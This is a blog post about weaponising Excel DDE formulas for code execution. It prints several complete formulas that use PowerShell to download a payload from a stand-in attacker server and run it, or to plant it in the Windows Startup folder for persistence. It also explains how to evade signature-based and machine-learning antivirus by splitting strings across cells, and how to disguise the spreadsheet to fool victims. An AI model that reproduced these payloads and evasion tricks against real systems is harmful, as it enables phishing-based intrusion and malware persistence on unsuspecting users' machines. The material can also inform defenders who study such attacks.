Malicious Excel DDE Execution with ML AV Bypass and Persistence

Introduction

If you've been living under a rock for the past month or two, you haven't heard of DDE. That's OK, I like rocks (they rock). DDE (Dynamic Data Exchange) is an attack vector, er I mean feature, in Microsoft Office products that allow for arbitrary code execution when a user clicks through some warnings. It's been noted that this is not much different than macro code execution, but there are a few key differences. In particular, macro code execution attacks have been around since the late 90s (and yeah they're still a big problem somehow - side note, has anyone actually ever used a legitimate macro enabled document?) while abusing DDE is a relatively new phenomenon. This post outlines a few obfuscation techniques that I have yet to see, particularly in Microsoft Excel.

Obfuscation

Obfuscation from signature-based AV is extremely easy. Sig-based AV should die a slow and painful death already; why it is still accepted as a "security tool" is confusing to me. It does nothing. Pad an exe with some nops and you'll bypass 90% (made up stat) of sig-based AV.

Anyway, my first crack at playing with DDE exploits was the following, copied directly from SensePost:

=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\"http://evilserver.com/sp.base64\");powershell -e $e'!A1

This is pretty basic, it downloads a base64 encoded payload and executes it by calling powershell from the command line from excel (bit confusing, huh?). My next test was adapted from a technique I read in the Null Byte blog:

=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c powershell.exe -nop -w 1 $e=(New-Object System.Net.WebClient).DownloadString(\"http://malicious.server.com/payload.txt\"); IEX $e'!_xlbgnm.A1

This does almost the exact same thing (the payload in this case is not b64 encoded) with one important difference. Instead of calling cmd directly, it calls a new instance of Excel to call the command line to call powershell to download a powershell payload and execute said payload (phew). You might ask why this is done. The reason is simple, from a social engineering standpoint it's easier to trick a user. Check out the difference side by side, er up by down or whatever:

cmd DDE code exec warning (credit to Null Byte blog

Excel DDE code exec warning (credit to Null Byte blog

Which would you trust? With a little social engineering both are passable, but the second is more ideal. However, we haven't yet gotten much into antivirus evasion and I've seen little work on this specific to Excel (most blogs seem to be concentrating on Word - IMO I feel like spreadsheets are more trusted in organizations because word docs are always the first that come up in security training from my experience). First is signature-based AV, although most AV products aren't picking up on anything DDE AFAIK, it's important to look forward and make your exploit robust against future detection.

The technique I thought to use was splitting up strings with string concatenation functions in Excel from other cells. Here is what my spreadsheet looks:

Excel DDE code obfuscation with string concatenation

See what's going on there? I've added some letters to other cells and used string concatenation to obfuscate the more suspicious looking stuff (cmd.exe, powershell.exe and the IEX powershell command). Of course this could be extended to obfuscate the entire thing should we want to. This, mixed with the CMD->MSEXCEL trick provides solid obfuscation from standard AV. Pretty easy huh?

Why it's still not enough

As I mentioned, signature-based AV can be bypassed using the above techniques, and these techniques even incorporate a little bit of social engineering. As an attacker, this leaves you in a good place. One problem though: what about machine learning-based AV (ML AV)? My concerns were realized when I attempted to run this on a Windows machine with SEP Cloud on it (an ML-based AV) and it immediately picked it up. My guess is there is some sandboxing going on that runs the code and picks up on the obviously suspicious download and execute commands. No es bueno, this is too obviously a malicious program running to anything with a vague notion of intelligence.

At HG we work a lot with ML, I'm no expert myself, but knowing how it works is important to our projects and being able to speak intelligently to our team without sounding totally ignorant is a must. For AV, ML works by taking malicious executables as training data for a statistical model. If your executable is "close enough" or rather acts like these executables within a statistical margin of error, you get flagged. This sucks for us hackers/pen testers - before this we could just write our own little rev shell executable and be confident that it would not be picked up.

So what do we do now? We need to fuck their model, or rather evade their model - this is a bit harder than signature-based AV, but still definitely possible. There are a few paths we can go down. My first thought was throwing in garbage commands that one would find in common programs, maybe move some stuff around the filesystem, have some if/thens in there that don't really do a whole lot, and generally just try to fuck their model by giving it normal programmy stuff. Statistically speaking, the malicious part would be buried in normal programs, which may be enough to do the trick. But that sounded like a whole thing, so I went the lazy way - do less. Instead of downloading and executing, what if we just downloaded? Surely no AV could flag a program simply for downloading something, nearly all programs do that. So check out the code I used:

=cmd|'/c p & B1 & wershell.e & C1 & e -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\"http://malicious.server.com/payload.txt\"); Set-Content -Path \"..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\whatevs.cmd\" -Value $e '!_xlbgnm.A1

The above is pretty similar to what we did before, except instead of executing anything we're simply downloading a string and writing to the Windows Startup folder. The next reboot will execute whatevs.cmd for us (note: whatevs.cmd must also be able to achieve AV bypass on it's own - but that's out of scope of this post) and also provide persistence for us. Let's scan a spreadsheet with the above code using SEP cloud:

Excel DDE code bypassing ML AV

Boom. Bypass'd.

Mo' Bypass Mo' Problems?

So everything is groovy right? Well... maybe ¯_(ツ)_/¯. So far we're in a good place, bypassing AVs like mofos and popping shells. But, in some instances the Startup folder may be locked down. Or another ML-based AV with different training data or a different classifier might pick up stuff copying to the Startup folder (though again, that's not a rarity for many normal programs and we're not actually exploiting any overflows or doing any kind of memory corruption or even priv esc attempts, just running stuff as a user). So maybe we are sorta groovy, but don't forget to do your reconnaissance before trying to use this.

The above techniques are actually way overkill in some situations - many major organizations (government and private) are still using signature-based AV and AFAIK they are not required by any security standards to use ML-based AV. This means a lot of organizations are likely still using Windows Defender (signature-based), just because it checks the box and it comes already installed on Windows (hooray security by box-checking!). In other situations, however, you want to test against the AV that your target organization is using. Some social engineering or something of the like would be very valuable here.

In other words, the work outlined here does not make it such that you shouldn't do your recon against your target before throwing stuff at it.

A quick word about debugging DDE code

It sucks. It's easy to get lost trying to escape Excel, cmd and powershell code in an Excel formula. Quotes are in weird places, double quotes are in even weirder places. Oftentimes a formula will just fail when seemingly all appears fine (to me). The trick I use is to build up the command, testing early and often and introducing tiny tiny new snippets at a time. That way at least if you don't know WHAT is wrong, you know WHERE it is wrong. Still, it sucks and I never thought I would miss tracebacks so much...

The Implication

So what does all of this imply?

Excel DDE code bypassing ML AV

Well, we've shown that DDE in Excel is rich with functions that allow for AV bypass. The world is your oyster. Another technique that can be used (not demonstrated here - left as an exercise to the reader :) is to use the Excel CHAR() function. This function allows you to use the decimal (NOT hex) ASCII value of characters in place of the actual character, yet another way to break up your formulas. I'm sure there are a ton of other Excel functions I haven't even considered that could hide your intentions from AV. In other words, AV sucks against DDE. I read a blog post about how DDE was no more dangerous than macros blah blah blah - perhaps they are similar, but IMO DDE is far richer in terms of options for obfuscation, and the fact that no security warnings show up for the user IS a big deal, not a minor detail. People click through security warnings like they are playing Fruit Ninja (that's still a thing right?), non-security warnings are basically just accepted.

Finally

These techniques were tested with ESET AV, Symantec Endpoint Protect and Windows Defender. None picked up anything suspicious. More tests against other targets and your experience with these techniques would be awesome. So hit me up on Twitter at @_hyp3ri0n.

Enjoy and please use responsibly. If you want to build on this work, obviously feel free. We'd appreciate a shout out if you use any of our techniques for further research :).

Final note: for social engineering purposes, the color that Excel 2016 uses in its headers is RGB(36,116,38), here is a picture of my spreadsheet to give you some inspiration (I know it looks shitty and unconvincing, it's for demonstration purposes only - also note the formulas and chars have been blended in with the background so as to not arouse suspicion):

Excel DDE code bypassing ML AV

Now stop reading this and go break some shit (legally and responsibly)!

Alex